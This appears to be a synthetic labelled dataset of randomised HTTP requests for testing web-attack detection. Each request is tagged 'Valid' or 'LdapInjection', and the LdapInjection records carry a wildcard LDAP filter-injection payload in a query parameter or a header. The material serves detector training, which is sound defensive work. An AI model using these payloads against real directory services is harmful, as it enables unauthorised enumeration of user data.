If-Unmodified-Since: Thu, 14 Aug 08 10:47:37 CET
If-Match: *
If-None-Match: "uKsX-IMHeY8G01dIz1"
If-Range: "SZULU__HOhnGOLK"
Max-Forwards: 2
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM bTJyYmw1ZGJudG90OWVydDR3aUEwdUgzZWFoYW1zYmUxZGV0ZW1oa2g=
Authorization: NTLM MjNwZGVSaHYxaWJvc1c2UjJyaXR1bnRlb29hNDFmZWhhYXRvdXpu
Range: -4,1101-830
Referer: /ryiosf/voaneqia/eXtv/dpPee.tiff
TE: chunked;q=0.0,chunked
Trailer: Cache-Control
User-Agent: oBorhref/8.9.4.1.0
UA-CPU: 68000
UA-Disp: 6221,5236,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5781x4344
Via: FTP/8.6 www.txnhImy.html
Transfer-Encoding: mroe
Upgrade: ezhTe/9.1, i0t/1.3, huh/6.9, rDvATi/7.5
Warning: 407 www.oa9bah.css "UfvriEEf" "Thu, 30 Apr 09 22:42:10 GMT"
X-Forwarded-For: 43.8.248.224
X-Serial-Number: 66994
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

B3Asonobtmec1=mheleo9&grTsrsleotefp=2731&3gae=s 7>&eIrtcgt1h=ov@7e4MgX&7rt=td<fnn<fDyn

End - Id: 34241
Start - Id: 29029
class: Valid
GET /ce/e@-RiWJbwMV0QPuz1fA/t09.cfm?dh=nho5ignyh&tnoirarorqeihVt=ndextm4i%2Fe&hmcsfd=095860336&emat7hiWas=52388284&teoaroyipl=dH&atnowEdhe=tnZe-D.B%40xrB&a1=210754&Sn2sdeinresesi=538&YK3@EE5tT=ae+dto%7EeeE HTTP/1.0
Host: www.suIsiLibp.net:166
Connection: prll6as
Accept: image/png;q=0.2, text/plain;q=0.0
Accept-Charset: iso-8859-8-i, windows-1255, x-mac-greek, x-mac-chinesetrad, iso-8859-8
Accept-Encoding: compress, identity;q=0.7, compress;q=0.7, compress;q=0.4
Accept-Language: h2ntne-aeaEede, rgpowR-y, oaeoF-riqlaskn;q=0.1, cge-Osm;q=0.3, nde4-cis6Nien
Cache-Control: only-if-cached
Client-ip: 30.74.109.177
Cookie: hrLrgvt7sy1pmtu=28;eaDonh=eh1nonls;dkmljelzkD=36984792
Cookie2: $Version="6"
Date: Mon, 19 Nov 07 02:09:33 GMT
ETag: W/"E1PsNYHqAeuMenzMDzx"
Expect: 100-continue
From: te6nde@Ieee0ntr7.net
If-Modified-Since: Tue, 02 Nov 04 07:42:21 CET
If-Unmodified-Since: Tue, 18 Jan 05 12:14:30 GMT
If-Match: "KRZjVOq_d@-I3aL4W6bz"
If-None-Match: "dwyp48xemUenRGMvAGnF"
If-Range: Wed, 26 Nov 08 04:45:22 GMT
Max-Forwards: 7
MIME-Version: 2.4
Pragma: ih=eiv
Proxy-Authorization: Basic ZjJlZTR0ZTpzZGZlbHQ=
Authorization: Basic bmkwZWVlaTpsdGVo
Range: 3-,5985-7558,753-
Referer: /ar50pupo/ieeLrn/aeswrxa.png
TE: chunked
Trailer: User-Agent
User-Agent: Mozilla/0.9 (X11; U; Open BSD i586 2.8; kp-ad; rv:6.2.9) Gecko/24365162
UA-CPU: x86
UA-Disp: 6183,441,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 694x8428
Via: FTP/2.1 www.orb8Mr.css:682
Transfer-Encoding: w8srdn
Upgrade: erJF/7.0, 5yR/2.8, dpedX/3.1
Warning: 992 www.ntgo3cv.htm "seCcmng" "Wed, 13 Apr 05 13:20:02 CET"
X-Forwarded-For: 157.73.34.25
X-Serial-Number: 055751373307057
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29029
Start - Id: 6093
class: Valid
PUT /rsi/yE/stlhngeaoJol/ohEoycNTcs9si/k9wUlwLGUGb_@i2a4cf/ltai6Assmgdlnu/f2LilAszYNJYLFa/nTr/rwQ_WT/UFwQBUO_.php? HTTP/1.0
Content-Length: 109
Content-Language: s3k8n,cnetv,atuhkcnr
Content-Encoding: compress
Content-Location: /arooseej/O5hHL/rtnieson/efoitArt.jpeg
Content-MD5: ZXhrdDVpZWVOaHl0b2d0dA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 27 May 04 05:14:47 GMT
Last-Modified: Thu, 24 Jul 08 14:52:10 UTC
Host: 242.79.71.109:80
Connection: ixfopE
Accept: text/html;q=0.6, image/jpeg;q=0.1, application/postscript
Accept-Charset: euc-kr;q=0.8, iso-8859-9;q=0.7
Accept-Encoding: 
Accept-Language: a9umNta-byii9n;q=0.1, 7-nl, Ro-Waa4tex;q=0.7
Cache-Control: min-fresh=5078
Client-ip: 39.222.108.79
Cookie: jza=6tt%osLienodem ;cetUdmidn=atnl;di1natT7nSja=8179
Cookie2: $Version="869"
Date: Wed, 21 Apr 10 04:25:33 GMT
ETag: "FyD9jloh6p4Fowm9S"
Expect: 100-continue
From: nhaaOo@seoRdErI.uk
If-Modified-Since: Mon, 07 Mar 05 10:46:00 CET
If-Unmodified-Since: Wed, 10 Mar 04 05:11:37 UTC
If-Match: "t468l0bE7LnaTZpZ9A7O"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: tccgoo atwSiNn=cetob
Range: 32908-897936,302-48186
Referer: http://www.5raad.ch/9emgI/tsui.mspx
TE: trailers,deflate
Trailer: If-Unmodified-Since
User-Agent: sui4z/5.0.2
UA-CPU: StrongARM
UA-Disp: 381,9388,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 179x0676
Via: HTTP/0.0 www.leoSRy.gif, 7.6 36.245.210.61, 9.8 83.80.151.22:8129
Transfer-Encoding: identity
Upgrade: asOo/3.7, xilcsc/2.8, h8r/6.5, llsa/6.6
Warning: 696 www.rlonIm7H.jpg "dt7r" "Wed, 17 Mar 04 18:58:49 GMT"
X-Forwarded-For: 224.40.113.11
X-Serial-Number: 124878
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dfBehsPieexatnl=uhtiumeytyhtaccessneittr/&glluceh=eD5WpnFC&eue1cnommt=hfh&tiHeoan=227507&i9jgthen6a=6005110

End - Id: 6093
Start - Id: 38231
class: LdapInjection
GET /wf@0XP@vkFIwH/hG7IkA1bG6fbamS/h4jd0Vx1bGk.BO.VwWx/fT8j04LTZlR8P@WbU.2/etdtphehlasn/t9lkYD/6-UAGX0U4abDW0Usz/anea4diotehnnDfhcw.mdb?eecu=5084&uneEsl5nididA=nraAesh&U1u-L4vz9qh-=edg&aunionvfromY8nZI2P=tadfAinEA4etb4i&pahctmlmm9ttCi=%29++++%28+++%7C+%28displayName%3Dhad*%29++++%28name%3D+had*++++%29%28+mail%3Dhad*+++%29&aaegso99bktl=4a4n%27Rsyiywii1aexecu%29e7 HTTP/1.1
Host: 148.34.65.34:42
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.6, identity
Accept-Language: *
Cache-Control: e8bHdo='on'
Client-ip: 63.201.6.101
Cookie: mi=a2_fyOAr;7a= aeh;t4qYG=ftgaccess_logi|t -:asb;HaiiuEea=4;fg=etEtrT;omrlat=bsRuHIa1a7aE1wdtl
Cookie2: $Version="541"
Date: Sat, 15 Aug 09 11:42:21 UTC
ETag: W/"pNPv_Emey7cK.eo-"
Expect: 100-continue
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Sat, 19 Nov 05 07:16:05 UTC
If-Unmodified-Since: Mon, 02 Oct 06 06:41:05 GMT
If-Match: "HIlWKS-mxv5p9s5KPfV"
If-None-Match: "_FL4Fr5OAtlqku3A2T"
If-Range: Thu, 15 Nov 07 10:45:16 GMT
Max-Forwards: 27
MIME-Version: 6.4
Pragma: yxaB6oui='iOp'
Proxy-Authorization: Digest opaque="grhibe"
Authorization: NTLM YnRvc2ZodmFhZXFodHNpcmRyb2NhaWVhS2VpcjdubHJlMA==
Range: 491-,605-2708,157323-67914
Referer: http://hfYt0.be/oltsc/petx/areb3e/nrfad/6q6Ha1h.php3
TE: trailers,deflate
Trailer: Accept-Charset
User-Agent: vmACZV9d http://www.OtsDoO.st
UA-CPU: StrongARM
UA-Disp: 5667,2371,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 525x5957
Via: HTTP/2.6 www.Tdayrom.jpeg:74027, 3.5 59.184.177.193, t2nNsc/3.2 www.erTiaE.png
Transfer-Encoding: identity
Upgrade: tDy/4.9, swatq/7.0, 819/1.0, ehWyo/6.8, 9edl/5.7
Warning: 935 180.240.199.184:8 "Ehcivfp" 
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 3952858356016801
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38231
Start - Id: 18465
class: Valid
GET /eso0thdniiaa8/e.6jfTl7c/HIfW/iarQUsA7AD.9l/petstobefyaPa64/uQhgartnrlw/1f02tOokDWU/h1FF/n5Hteumh6zjzogiex4o/stAWNW.rr/Ydjk5Z.7rcpR/qTOps.asp?ie=0965&iiKYa=l%3F-lre%26rhimgtbk7rn%3A%7C%29&l8nuejLiylau=ep&derde=i%3CpsOcbgsoundc%3Fit7id&XnullW1pkN=R%3A%27eGge&r8eyyeiaste=900&lu=n4s&e2oic=99674&bt=63434085&utitXi=Izincl&eshrp1or=e%7CWemesg0cof%5Co&7DnVCkexeche=nxhey1r+onhiahomeb&Ac3sral=tssystemc&sachBtor=614770 HTTP/1.1
Host: www.Afgsh0oepe.be
Connection: mAeemb
Accept: image/gif;q=0.2, audio/*;q=0.0, text/*
Accept-Charset: iso-8859-8, iso-8859-8-i;q=0.5, windows-1258;q=0.4
Accept-Encoding: *;q=0.9
Accept-Language: Ae-M, eI-mtlonpuu;q=0.7, un-zottAgyn;q=0.9, anh-iee;q=0.5, uaDe-t8zD;q=0.1
Cache-Control: max-stale=121
Client-ip: 223.195.59.109
Cookie: R3Rkclsihieist=3LOQ;tbzatee=57;rmaiossdkcTuO=57;1nacnr0eh=55507248;iiusrh5wz=ttgterwetiusn
Cookie2: $Version="0"
Date: Wed, 07 Mar 07 01:34:27 CET
ETag: "ieWN9rxKmZnfffV"
Expect: 100-continue
From: tgrartc0@enmrneaz9.org
If-Modified-Since: Wed, 04 Mar 09 10:08:17 UTC
If-Unmodified-Since: Sat, 14 May 05 04:41:48 UTC
If-Match: *
If-None-Match: "2Hlyt.yjZBaQJTRlt"
If-Range: *
Max-Forwards: 59
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: mdtspE NmaFtM=lagctp
Authorization: NTLM bnU0bHR0UHQ1bjNjSW93YXJOZXRvb2VFaXdxaWFpdTRoZXdlbGI=
Range: 72-79
Referer: /eAPe/rtr5hpl.css
TE: trailers,trailers
Trailer: Via
User-Agent: h1g2aDb1d http://www.fdea.biz
UA-CPU: PowerPC
UA-Disp: 454,2139,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 934x751
Via: 5.6 www.drgluBu.gif, FTP/0.9 109.96.197.66
Transfer-Encoding: gzip
Upgrade: mxde/0.7, asl/0.0, vl5w/1.3
Warning: 975 www.T3nto.html "tmezsAhMh3o5uamnt0or" 
X-Forwarded-For: 110.33.123.65
X-Serial-Number: 63866719
----: -------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 18465
Start - Id: 17020
class: Valid
GET /dZh-pl/smdIFV3IJhr-x2/zmYbI/of3fXBPT61cpQhlO/iNpTHi5/tbupt690XZSPSPI/wvotewuuhillopjJitn/nIxtrmahri8ai/Onotzdm1/nPx0wdT3ZHBoLt5O/tFo1zJ2CHc.html?0A-jiframemdocumentDlA=%27%25&TNr=+passwd&eet8Uuetd1ai=d21form&atDzeo3=963&8l=7719577&arnzcsds=suficqk&hzaeEn=nac&wf5kerkhxsteen=ereho0rc6trOtpS&oopoE=944529545 HTTP/1.0
Host: 49.189.102.204
Connection: h5Rs
Accept: */*
Accept-Charset: iso-8859-4;q=0.7
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.2
Cache-Control: min-fresh=47
Client-ip: 8.211.78.35
Cookie: now82soehNot==2bvunrm7;ia=a=3rrp7b;ttirh=ta;gre6nG8ungZnTe=neseies
Cookie2: $Version="476"
Date: Wed, 24 Jun 09 01:08:35 CET
ETag: "9gnrZt9q-u5@-JpOlB3"
Expect: 100-continue
From: roye@rrdiYao9wh.cz
If-Modified-Since: Mon, 09 Oct 06 05:37:30 GMT
If-Unmodified-Since: Thu, 06 Apr 06 09:50:59 CET
If-Match: "JMKitWJZxETVXhEQVni"
If-None-Match: *
If-Range: Thu, 09 Jul 09 04:45:15 GMT
Max-Forwards: 25
MIME-Version: 3.6
Pragma: tGu=ne
Proxy-Authorization: aryAs meoilhof=haoFtAtl
Authorization: Basic YW81RGthOnRsbkl5bGlV
Range: 9605-9
Referer: /isyanesi/rzseezr.jsp
TE: trailers,gzip;q=0.9,gzip
Trailer: Authorization
User-Agent: hobssu/7.4.9
UA-CPU: StrongARM
UA-Disp: 7236,439,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 044x401
Via: sg2ot/9.5 www.i8ttH.gif, 6.9 48.106.14.23, rirdr/6.8 www.n4sta9El.js:779
Transfer-Encoding: compress
Upgrade: odh5/2.1, xoa/9.0
Warning: 748 211.185.9.15 "1tesO3h" "Fri, 30 Nov 07 14:52:33 UTC"
X-Forwarded-For: 183.169.171.70
X-Serial-Number: 380344
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17020
Start - Id: 30533
class: Valid
GET /ten4DnE9hbEqllSlnqj/accept8open7F3r5logEYRv/ooernaf2hc2Ccbso/resdtkp6omohsHia/O.LGRWshutdownGGvTf2/qdta/tth/tJK2xGmhfapub/tghEcSbieGtfaunnL/9HKHNI/iZ.css? HTTP/1.1
Host: 219.45.212.144
Connection: iolDyN
Accept: image/*;q=0.0, audio/x-wav, video/*
Accept-Charset: macintosh
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 133.1.177.55
Cookie: rOatS=1744232;aFahraegop=h-9vrHqJvCNO
Cookie2: $Version="6"
Date: Wed, 28 Feb 07 07:52:40 UTC
ETag: W/"yuXYFisztBNDVvs812"
Expect: 100-continue
From: bazsaaR@y3h4ig.st
If-Modified-Since: Tue, 28 Sep 04 07:54:12 CET
If-Unmodified-Since: Fri, 03 Jun 05 10:06:07 CET
If-Match: "_tHk6moevXhiDawb@ez"
If-None-Match: "oHAm8DCnkFcEkb_cihbk"
If-Range: "qntiCut6.tm8y7o"
Max-Forwards: 9
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: NTLM cGFseXRkbGE4c3VvYWhpbzVheW1zb0tFaWVlbnh0dHRkcGJlVW10M3QxbGhlZQ==
Authorization: Basic cGNodDowZWFhaWdtZQ==
Range: -47,-9645,79-6262
Referer: http://2OgrubJ.cz/1tsm7mW/dea96lev/Ae4ahst/aonsSn/Hmnernf.msf
TE: chunked;q=0.5,gzip;q=0.8
Trailer: If-Modified-Since
User-Agent: Mozilla/0.5 (Windows; U; Win 9x 5.6; e7-Am; rv:8.9.4) Gecko/15795695
UA-CPU: 68000
UA-Disp: 8976,710,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 848x9139
Via: 8.8 www.tot1Hrol.gif
Transfer-Encoding: aw6n6C
Upgrade: psezsR/2.5, pzmc/6.5
Warning: 596 www.e1mel8l.shtml "telnrnohrlong" 
X-Forwarded-For: 175.103.25.65
X-Serial-Number: 60141
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 30533
Start - Id: 14622
class: Valid
GET /9ol6ZoF8@xpz/sempyinwbsltUieo/fasslaat4tcadmd/sAAK..D.php3? HTTP/1.0
Host: www.nisnrrlIs.it
Connection: close
Accept: image/*;q=0.1, video/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: whiahxd-ocifMq, ryAc-xNtNea;q=0.0, bMoiiequ-a, raoqeo-etiol;q=0.7, isoaAuL-8ktolwl;q=0.5
Cache-Control: max-age=0507
Client-ip: 113.70.75.117
Cookie: M32Drnau=oiyni;cAesyhfjvs=dx1zO;Rdohed=881;nrxdryace1rea=rinsert3ov1wr;dhsAh1wnrsitgtl=)pUnetcattEroj
Cookie2: $Version="53"
Date: Fri, 04 Dec 09 04:46:18 UTC
ETag: W/"bSZN.hzV37mupqiLdQN"
Expect: 100-continue
From: uneUynt@llT9mrd0ie.uk
If-Modified-Since: Wed, 18 Feb 04 22:35:55 GMT
If-Unmodified-Since: Sat, 15 Nov 08 12:24:15 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5192
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Basic QWVlOGFzRTpENm9lb3p0
Authorization: Digest realm
Range: 014236-,328751-67,-519123
Referer: http://www.09g3i.org/Osig8O/oL2o3tkl/lnsiohf/azn2NwI.wmn
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/4.7 (compatible; Konqueror/7.3; Open BSD i386; ifpmnw0; ssoa)
UA-CPU: PowerPC
UA-Disp: 1652,237,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2347x669
Via: FTP/6.1 www.Sdshuli.html, 4.8 244.161.54.211
Transfer-Encoding: p9wih; hbNsh8D=rg4wEanB
Upgrade: sep9n/1.9, toxe/6.1, lpmu/3.8, a8iA/5.8, gtttil/4.9
Warning: 729 222.217.184.32 "Seioo3tr0ha" "Sun, 22 Jul 07 15:10:27 GMT"
X-Forwarded-For: 214.165.29.201
X-Serial-Number: 28910349808
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14622
Start - Id: 37276
class: LdapInjection
PUT /ePDtI@xoEUN4Q3sTgYo/0marr8/iP/seer/l2cr0I9bz3c8znB005E/xeeq2lvn/aso0jfwaet/alls1s/a7x2F98DFi@-gFa/sbecnFett.sh? HTTP/1.1
Content-Length: 55
Content-Language: xlsifaie,jA
Content-Encoding: gzip
Content-Location: http://xgttaaot.net/0pbe1at.txt
Content-MD5: ZUJnZTB0YWlzd2VsdG9zcQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Jul 04 16:06:40 GMT
Last-Modified: Sun, 09 Jul 06 23:08:53 CET
Host: 188.61.183.185:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: )    ( |(displayName=had*)  (name  =  had*    )(   mail=had*   )
Accept-Language: *;q=0.2
Cache-Control: max-age=81
Client-ip: 82.53.204.28
Date: Sun, 15 May 05 17:53:35 CET
If-Modified-Since: Tue, 02 Nov 04 05:16:04 UTC
If-Match: *
If-None-Match: "VA0sof3JPxJDPIiM"
Max-Forwards: 67
Authorization: tthat ratSmx=s6ezt
Referer: http://www.asuElDe1.org/eisjE1es.png
User-Agent: Mozilla/8.6 (compatible; MSIE 4.5; Linux i586; sus7Tnm; A43re)

mezo3tiw=aCeo&sske=v@&E40sr0=wdDSrkTtI&e9t=rPZRx@6_

End - Id: 37276
Start - Id: 12120
class: Valid
GET /gKgNM@88z/sZ-ulon35/iEi/6qVzhLqUMrrlx1/7tcns7os2gesz/upHehnd1sktsHyAa/KaaavuJr.nsf?mjnieOts56qln=7&oeb=Soch&MaZstyle_b=eet&HZKui=0106052&sstchbveaQt=00257&xM5JK72zOidTH=fetovZtn1iotnor&orddb=7&shutdownwUaBb=605 HTTP/1.1
Host: www.nmtiarh.cz
Connection: close
Accept: text/*;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 92.187.253.162
Cookie: nsm079=347949;aelqE96lsseonbe=hmia:scriptf/=\=ree g 
Cookie2: $Version="222"
Date: Sun, 28 Nov 04 15:08:48 GMT
ETag: W/"m4kMhaJSuJn1SXDt9"
Expect: 100-continue
From: 1ygx3rl@zebdo07.net
If-Modified-Since: Wed, 16 Nov 05 20:51:50 GMT
If-Unmodified-Since: Sun, 30 Sep 07 19:47:33 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 18 Nov 05 13:18:26 CET
Max-Forwards: 1522
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM NmltbTNnbmU0YXRnZm9mdHJ0bG9zaW5kcjZMYTBBNm9kT2llaW9zb3NhZWVwb2M5
Range: 2-
Referer: http://www.tteeei5.it/Headcv/tl8colsi/preuet/fAAio.gz
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/4.9 (compatible; MSIE 7.2; Windows NT; jlu7up; cen9or)
UA-CPU: MIPS
UA-Disp: 3494,5887,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 556x8407
Via: FTP/6.5 www.iseu.jpg
Transfer-Encoding: yteaa
Upgrade: Cdr/9.5, gton/2.2
Warning: 364 www.rnndhhu.html "lNiB7of9mccT8t4" 
X-Forwarded-For: 192.179.67.70
X-Serial-Number: 180006771831212
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12120
Start - Id: 4045
class: Valid
PUT /eu/iamGlAq6GYa-axmIT6AZ.msf? HTTP/1.0
Content-Length: 259
Content-Language: lho0t3o,ajn
Content-Encoding: gzip
Content-Location: /hisgbRc/crosen/5anib/iuhn.dll
Content-MD5: aW9sNHJldXNya2l0Ym1vZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 20 Aug 08 11:55:26 GMT
Last-Modified: Sun, 14 Oct 07 22:08:52 GMT
Host: www.s0nentann.biz
Connection: keep-alive
Accept: video/quicktime, text/html;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 90.81.123.225
Cookie: gepimwtnoldt=c3deoNa8(-;ste=tahl(nc;iws2ttEeus=6;tene=vtcq
Cookie2: $Version="3"
Date: Mon, 27 Apr 09 01:21:15 CET
ETag: "w0dQAs5W2t3HW7DOu-bw"
Expect: Jh5r4
From: eittnis@mfhoIolo.net
If-Modified-Since: Tue, 17 Nov 09 14:05:18 UTC
If-Unmodified-Since: Sun, 28 Feb 10 23:44:19 GMT
If-Match: *
If-None-Match: "6hXGD8oC9QjEY89xfNQ"
If-Range: "HAwmmPb@onp8vSLMG"
Max-Forwards: 085
MIME-Version: 4.8
Pragma: a=tori
Proxy-Authorization: tvSo3 l1oo=dbetatzy
Authorization: NTLM Z2xhc2FvZWRpdDhvaHRlblM2NWJwdXRobGVpbGFhb2RuZWNMY2FhZXNybTBn
Range: -873,8194-
Referer: http://aaEisRA.cz/Vfur.txt
TE: trailers,trailers
Trailer: Range
User-Agent: Mozilla/3.4 (Windows; U; Win98 5.2; wz-Nq; rv:0.9.0) Gecko/51806597
UA-CPU: PowerPC
UA-Disp: 055,684,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 333x496
Via: HTTP/6.8 www.toe8s.tiff:7980, HTTP/7.4 www.rdlatawm.html, FTP/2.4 www.osjeo.shtml
Transfer-Encoding: deflate
Upgrade: knge/9.2, thhhOo/4.5, tlmet/8.8, ex2/3.7
Warning: 077 170.228.207.137 "0iuylmonu9ff" 
X-Forwarded-For: 167.12.120.135
X-Serial-Number: 8242203190314
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

0M3LbrQcAczG=lr7&lyauacaytn=7685&h39tury2mciclIH=5861852&bayi7Ea66eh=82250&Tx=Fenor&uDmdr=5ZrG4tJCq6i&cs9tosN=fxL1Pj_&itp=69&ha=rzM1.6tTk_@D&erATnth=88965041&Esnlcaice0hsh=tYLQ4c2qjuA&I3leu4o0otsf=93&tPepwctxtrlfs=32627&mlqnc=wASA:&iygnlAaudr=in6nvmhIwnDr

End - Id: 4045
Start - Id: 15575
class: Valid
GET /e10kDhqqUd5gWQR8kL/oaenomnfsskiuzu4err/a3nOb3wketnaOeuasb/PZecmdaFi/m3Y64r/htt/iCbn1kKjFJg3hf8ObOJx/ijoCUZg_7Zvzdc_8/Tlooiocgtenw2wdaoz/smrd8eeooqEdmrea/hmfsTaSedcanidnIisuu/dCbKjAU3ZGrk@.css? HTTP/1.0
Host: 246.205.55.215
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: dr-od8pRtng;q=0.5, jibe-t2mrhren, 2xf-4nkate;q=0.1
Cache-Control: no-transform
Client-ip: 243.119.45.229
Cookie: TSswhereJM576Uh=rjz4Ms
Cookie2: $Version="762"
Date: Fri, 30 May 08 10:10:59 GMT
ETag: "mNbVp5ZBEarBgcSmY"
Expect: 100-continue
From: Ftobr@eibao.net
If-Modified-Since: Sat, 25 Jul 09 08:00:38 GMT
If-Unmodified-Since: Wed, 29 Dec 04 23:17:16 UTC
If-Match: "E5T2xRy9YdhI4i-g"
If-None-Match: *
If-Range: Sat, 25 Dec 04 20:24:25 UTC
Max-Forwards: 723
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic YmJzS2VvOm1tZWk=
Range: 58-,2-
Referer: /ihhwtd.mdb
TE: deflate,gzip;q=0.7,trailers
Trailer: Via
User-Agent: Mozilla/7.4 (compatible; cw261e; Open BSD i386; poivek; t3noids8i)
UA-CPU: StrongARM
UA-Disp: 213,6888,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 817x4367
Via: HTTP/2.3 65.205.20.242:513, HTTP/6.8 187.167.197.238
Transfer-Encoding: identity
Upgrade: aeaae/1.2, oeh0/9.9, asctrd/8.3
Warning: 737 123.135.15.139 "27acrahrs" 
X-Forwarded-For: 70.192.139.43
X-Serial-Number: 4557726217620382027
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15575
Start - Id: 20019
class: Valid
GET /espda8knSiotfwitha/lhYtPIIozlxoqHVCzE.msf?usirowDirip=9481&nsReareroe6tmg=e1Oi&eAttograWnLtmdh=ncHa2H8CNB_B HTTP/1.1
Host: 22.152.193.169
Connection: esl0a
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 24.128.85.39
Cookie: 2ind=356;Hla=eTlre;r2sctgr=edfiu
Cookie2: $Version="486"
Date: Wed, 11 Mar 09 08:55:26 UTC
ETag: W/"hb3K6rPvSU6q_38b"
Expect: 100-continue
From: ette@wio5ja.net
If-Modified-Since: Wed, 24 Jan 07 14:40:31 UTC
If-Unmodified-Since: Tue, 03 Jan 06 19:28:02 UTC
If-Match: "Ld@27drs6Yc9cNy"
If-None-Match: *
If-Range: "x7vBihiGHe6@ELgRk-08"
Max-Forwards: 15
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic bnhoZEV5OnJkTmVldGk=
Authorization: tnbMes dtnlvsU=enclxbjn
Range: -9850,-091367
Referer: /6trpnh/iun4eew/stpurst/ieztn.css
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/4.7 (Windows; U; Win 9x 6.8; 2e-tL; rv:8.3.8) Gecko/27804275
UA-CPU: PowerPC
UA-Disp: 6419,466,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 6883x9445
Via: 0.6 171.46.64.166, HTTP/9.0 www.ioeu.jpeg:1, 4.1 166.77.69.98
Transfer-Encoding: identity
Upgrade: hOdDrk/2.2, heah/7.0, trac/2.7, rIfahb/1.5, oeeca/4.1
Warning: 933 www.eoio.png:16177 "hIirthSs" "Tue, 06 Feb 07 23:19:23 CET"
X-Forwarded-For: 99.9.48.167
X-Serial-Number: 185531423
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20019
Start - Id: 12082
class: Valid
GET /t17DzBMrrCcs4T/gce5thshe18els1/JP0jHC.php3?lrtlsrygyT=z&so=ooK&ezeEXhTnar=i-TQO&ppan=++bcllncr&.oBRGE_Pecho6Z=771&shutdownQq81cfrom0Je=tetC&CUjpsN=er+e+ah&ywnhv3hrl7i=eXlOer1BwAe&_-Lreplacewsock_streamck-=7216764&2egwN5exec@Nj=Yhefl%24de%3Bgra&eapanlt=S&iwmrnem=5668&suaEgahi=eenusez4oatsi&garDtpipnUf6ee=11 HTTP/1.0
Host: www.assvlinee.cz
Connection: keep-alive
Accept: text/html, audio/*;q=0.2
Accept-Charset: utf-8, x-mac-turkish, x-mac-cyrillic;q=0.9, x-mac-korean, windows-1257
Accept-Encoding: 
Accept-Language: etmuen-4ss;q=0.6, ndb-ueah;q=0.1
Cache-Control: min-fresh=01
Client-ip: 136.6.185.125
Cookie: VS0Ax=7902573;Wwltteuosmedswa=s? 7s3;execrCBCUY=de3s1hwame6t
Cookie2: $Version="08"
Date: Thu, 12 Jan 06 11:49:29 GMT
ETag: "dXpI4cLssmr0mH-UnG"
Expect: onaNtti6=wymieb
From: k9srctlU@gEhaot2P.gov
If-Modified-Since: Thu, 19 Nov 09 12:46:01 GMT
If-Unmodified-Since: Tue, 26 Jun 07 06:54:09 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 30 Apr 10 09:09:35 GMT
Max-Forwards: 8
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM bjV0bmludXJhR3BuZWlkYXRkb21ub25lbFpsbm50U29jaXZqYXNlZg==
Authorization: Basic c2Vhc2JhOnJvdG50
Range: 86737-87721,-9149,666-
